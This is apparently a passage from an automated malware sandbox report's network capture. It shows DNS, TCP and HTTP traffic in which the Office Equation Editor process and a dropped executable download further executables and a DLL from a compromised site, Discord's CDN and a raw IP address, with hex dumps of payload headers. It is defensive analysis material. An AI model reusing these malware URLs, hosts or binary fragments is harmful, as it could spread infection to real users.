                                Aug 5, 2022 11:41:36.366695881 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366712093 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366729021 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366751909 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366765022 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366775990 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366796970 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366799116 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366823912 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366847038 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366867065 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366872072 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366897106 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366920948 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366941929 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366945982 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366969109 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366991997 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367012024 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.367016077 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367039919 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367074013 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367095947 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367100000 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.367120028 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367144108 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367165089 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.367176056 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367213011 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367240906 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367259026 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.367264986 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367290020 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367333889 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395163059 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395216942 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395246029 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395271063 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395301104 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395324945 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395359993 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395385981 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395405054 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395423889 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395442009 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395461082 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395473003 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395478010 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395498037 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395515919 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395520926 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395538092 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395545959 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395572901 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395596027 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395622969 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395625114 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395647049 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395665884 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395684958 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395694971 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395703077 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395720959 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395731926 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395740032 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395765066 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395791054 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395806074 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395814896 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395843029 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395868063 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395889997 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395893097 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395915985 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395919085 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395940065 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395956993 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395960093 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395967007 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395992994 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395993948 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396017075 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396044016 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396064043 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396080017 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396083117 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396101952 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396121025 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396137953 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396146059 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396167994 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396172047 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396188021 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396207094 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396207094 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396225929 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396226883 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396245003 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396262884 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396270990 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.399621010 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.423975945 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.424014091 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.424268961 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:40.198798895 CEST4917380192.168.2.22109.206.241.81

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 5, 2022 11:41:32.226768017 CEST5586853192.168.2.228.8.8.8
                                Aug 5, 2022 11:41:32.245600939 CEST53558688.8.8.8192.168.2.22
                                Aug 5, 2022 11:41:35.477466106 CEST4968853192.168.2.228.8.8.8
                                Aug 5, 2022 11:41:35.498608112 CEST53496888.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Aug 5, 2022 11:41:32.226768017 CEST192.168.2.228.8.8.80x4e86Standard query (0)pkusukoharjo.comA (IP address)IN (0x0001)
                                Aug 5, 2022 11:41:35.477466106 CEST192.168.2.228.8.8.80xdd2eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Aug 5, 2022 11:41:32.245600939 CEST8.8.8.8192.168.2.220x4e86No error (0)pkusukoharjo.com136.243.86.20A (IP address)IN (0x0001)
                                Aug 5, 2022 11:41:35.498608112 CEST8.8.8.8192.168.2.220xdd2eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                Aug 5, 2022 11:41:35.498608112 CEST8.8.8.8192.168.2.220xdd2eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                Aug 5, 2022 11:41:35.498608112 CEST8.8.8.8192.168.2.220xdd2eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                Aug 5, 2022 11:41:35.498608112 CEST8.8.8.8192.168.2.220xdd2eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                Aug 5, 2022 11:41:35.498608112 CEST8.8.8.8192.168.2.220xdd2eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • pkusukoharjo.com
                                • cdn.discordapp.com
                                • 109.206.241.81

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249171136.243.86.20443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249172162.159.129.233443C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.2249173109.206.241.8180C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                TimestampkBytes transferredDirectionData
                                Aug 5, 2022 11:41:36.249592066 CEST115OUTGET /htdocs/zTALg.exe HTTP/1.1
                                Host: 109.206.241.81
                                Connection: Keep-Alive
                                Aug 5, 2022 11:41:36.279833078 CEST116INHTTP/1.1 200 OK
                                Date: Fri, 05 Aug 2022 09:41:36 GMT
                                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                Last-Modified: Sun, 31 Jul 2022 13:41:30 GMT
                                ETag: "34400-5e51a0a6efe70"
                                Accept-Ranges: bytes
                                Content-Length: 214016
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/x-msdownload
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 00 00 13 30 02 00 28 00 00 00 06 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 28 13 00 00 0a 2a 13 30 02 00 2c 00 00 00 07 00 00 11 16 0b 2b 1b 00 07 17 fe
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTb<[ @ @x[S` H.text; < `.rsrc`>@@.relocB@B[H(*(*ssss*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0.+,,,++((*0(+,,,++(*0,+
                                Aug 5, 2022 11:41:36.279875040 CEST118INData Raw: 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 d0 05 00 00 02 28 14 00 00 0a 2a 13 30 02 00 28 00 00 00 08 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02
                                Data Ascii: ,,,++(*0(+,,,++(*0C+;,,-%,(+*,,++*0*(*0O+C,~-2
                                Aug 5, 2022 11:41:36.279906034 CEST119INData Raw: 61 02 00 06 28 23 00 00 0a 28 38 00 00 0a 26 de 0c 28 2d 00 00 0a 28 2e 00 00 0a de 00 2a 01 10 00 00 00 00 07 00 30 37 00 0c 1d 00 00 01 1b 30 03 00 d1 01 00 00 10 00 00 11 7e 15 00 00 04 39 c6 01 00 00 7e 18 00 00 04 7e 14 00 00 04 16 28 30 00
                                Data Ascii: a(#(8&(-(.*070~9~~(0;(]("(b(#(9-(]("(b(#(:&~(;,[~(<(=+.o>o?(<(03o@2(-(.
                                Aug 5, 2022 11:41:36.279937029 CEST121INData Raw: 00 00 0a 28 2a 00 00 06 06 28 4f 00 00 0a 28 23 00 00 0a 6f 52 00 00 0a 7e 1c 00 00 04 28 5f 02 00 06 28 49 02 00 06 6f 4a 00 00 0a 28 22 02 00 06 28 4b 00 00 0a 0b 12 01 28 6a 02 00 06 28 4c 00 00 0a 28 70 02 00 06 28 4e 00 00 0a 28 73 02 00 06
                                Data Ascii: (*(O(#oR~(_(IoJ("(K(j(L(p(N(s(+(t(((A(Q(*(#oR~(_(IoJ("(K(j(L(p(N(s(+(t((`(-~(u(K~
                                Aug 5, 2022 11:41:36.279968023 CEST122INData Raw: 00 00 0a 2a 00 00 01 10 00 00 02 00 11 00 9e af 00 0e 00 00 00 00 1b 30 06 00 3f 01 00 00 16 00 00 11 28 47 01 00 06 0a 06 6f 48 00 00 0a 0b 7e 13 00 00 04 16 33 11 1c 07 28 49 00 00 0a 28 24 00 00 06 38 04 01 00 00 7e 13 00 00 04 17 33 2f 28 7f
                                Data Ascii: *0?(GoH~3(I($8~3/((,(*sd(%(-(.~3e(~(_(IoJ(h(K~(L((M('l(-(.`~3
                                Aug 5, 2022 11:41:36.279998064 CEST123INData Raw: 00 00 0a 0c 08 11 04 73 87 00 00 0a 0d 09 02 6f 88 00 00 0a 7e 24 00 00 04 05 16 fe 01 5f 39 ae 00 00 00 09 16 6f 89 00 00 0a 28 51 00 00 0a 03 6f 52 00 00 0a 13 07 11 07 73 64 00 00 0a 13 08 73 8a 00 00 0a 13 06 11 06 28 74 02 00 06 6f 8b 00 00
                                Data Ascii: so~$_9o(QoRsds(to(h(K~(L(p(Noso(h(K~(L(p(Nooo(o+oo_,;o
                                Aug 5, 2022 11:41:36.280029058 CEST125INData Raw: 07 8e b7 6f 74 00 00 0a 08 11 0c 0e 05 11 0c 6f a8 00 00 0a 28 a9 00 00 0a 13 0a 28 51 00 00 0a 11 0a 6f 52 00 00 0a 13 0b 11 06 11 0b 16 11 0b 8e b7 6f 74 00 00 0a 11 14 6f aa 00 00 0a 2d ae de 16 11 14 75 39 00 00 01 2c 0c 11 14 75 39 00 00 01
                                Data Ascii: oto((QoRoto-u9,u9o]ot(((QoRotot((((&oRotoeouovswox
                                Aug 5, 2022 11:41:36.280057907 CEST126INData Raw: 0a 2a 1e 02 13 30 05 00 a8 01 00 00 1e 00 00 11 16 13 14 38 99 01 00 00 00 11 14 1a fe 01 2c 29 12 10 28 af 00 00 0a 28 04 00 00 06 6f b0 00 00 0a 6f b1 00 00 0a 13 11 12 11 28 b2 00 00 0a 73 b3 00 00 0a 13 06 1b 13 14 00 11 14 1d fe 01 2c 0f 28
                                Data Ascii: *08,)((oo(s,((,s,,(,jo,"((o,2js,(
                                Aug 5, 2022 11:41:36.280088902 CEST127INData Raw: 01 2c 0c 16 06 8e b7 17 da 13 04 0c 1b 13 05 00 11 05 1c fe 01 2c 1f 08 18 5d 16 fe 01 08 06 8e b7 17 da fe 01 16 fe 01 5f 08 16 fe 02 5f 39 5c ff ff ff 1d 13 05 00 11 05 1b fe 01 2c 08 38 38 ff ff ff 1c 13 05 00 11 05 19 fe 01 2c 09 73 61 00 00
                                Data Ascii: ,,]__9\,88,sa,,+8oco*z((((}**0#8,{+tso,{+o,{
                                Aug 5, 2022 11:41:36.280119896 CEST129INData Raw: 14 14 28 98 00 00 0a 28 e2 00 00 0a 28 cc 00 00 0a 3a 6e ff ff ff 07 14 28 d3 02 00 06 16 8d 07 00 00 01 14 14 14 28 98 00 00 0a 28 e3 00 00 0a 0a de 10 25 28 2d 00 00 0a 0d 16 0a 28 2e 00 00 0a de 00 06 2a 00 00 00 41 1c 00 00 00 00 00 00 00 00
                                Data Ascii: (((:n(((%(-(.*A0['({*(9-{*(:&{*((#(;->so;{*((#o%(-(.,o]{*((#
                                Aug 5, 2022 11:41:36.308034897 CEST130INData Raw: 0e 11 0e 16 11 09 a2 11 0e 13 0f 11 0f 14 14 17 8d 52 00 00 01 13 10 11 10 16 17 9c 11 10 17 28 9c 00 00 0a 26 11 10 16 90 2c 1f 11 0f 16 9a 28 11 00 00 0a d0 0c 00 00 1b 28 14 00 00 0a 28 a0 00 00 0a 74 0c 00 00 1b 13 09 1f 60 0a 11 09 8e b7 17
                                Data Ascii: R(&,(((t`/oQ_QcQ((((oR/((Q8V(9


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249171136.243.86.20443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                2022-08-05 09:41:32 UTC0OUTGET /giving/qGTGx.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: pkusukoharjo.com
                                Connection: Keep-Alive
                                2022-08-05 09:41:32 UTC0INHTTP/1.1 200 OK
                                Date: Fri, 05 Aug 2022 09:41:32 GMT
                                Server: Apache
                                Last-Modified: Sun, 31 Jul 2022 13:50:36 GMT
                                Accept-Ranges: bytes
                                Content-Length: 8704
                                Connection: close
                                Content-Type: application/x-msdownload
                                2022-08-05 09:41:32 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1b 88 e6 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 18 00 00 00 08 00 00 00 00 00 00 de 37 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb7 @@ @
                                2022-08-05 09:41:32 UTC8INData Raw: 65 76 65 6c 20 6c 65 76 65 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 73 73 65 6d 62 6c 79 3e 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0c 00 00 00 e0 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: evel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo></assembly>07


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249172162.159.129.233443C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                TimestampkBytes transferredDirectionData
                                2022-08-05 09:41:36 UTC9OUTGET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1
                                Host: cdn.discordapp.com
                                Connection: Keep-Alive
                                2022-08-05 09:41:36 UTC9INHTTP/1.1 200 OK
                                Date: Fri, 05 Aug 2022 09:41:36 GMT
                                Content-Type: application/x-msdos-program
                                Content-Length: 87040
                                Connection: close
                                CF-Ray: 735e93f4e803917c-FRA
                                Accept-Ranges: bytes
                                Age: 413704
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=seven.dll, attachment
                                ETag: "2851da4de93a5c4b08e7da2826112280"
                                Expires: Sat, 05 Aug 2023 09:41:36 GMT
                                Last-Modified: Sat, 30 Jul 2022 15:29:32 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: HIT
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1659194972956420
                                x-goog-hash: crc32c=8mCulQ==
                                x-goog-hash: md5=KFHaTek6XEsI59ooJhEigA==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 87040
                                X-GUploader-UploadID: ADPycds5b2CHJAt_kHBlbZKsfyHFbeIkycGhR-EB4H_CNzfN58kbv3R3-Y3p7uBrmiWmMwfc1qb2ghWSD94ralZViz0AeYJdb2Iy
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=89ReIRTIqYMHUH6qW0Rjrx86JhSs4wkT1Qdn0V2a0ZgE%2FIit6XRToktZJxmD8M%2BNbzXPCDlqEkj93R%2FrfzgBCBAotKwJDiOBa9UGZALrIIrBlt%2BR1vfz78IxqlgQ1LPQNq36eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-08-05 09:41:36 UTC10INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
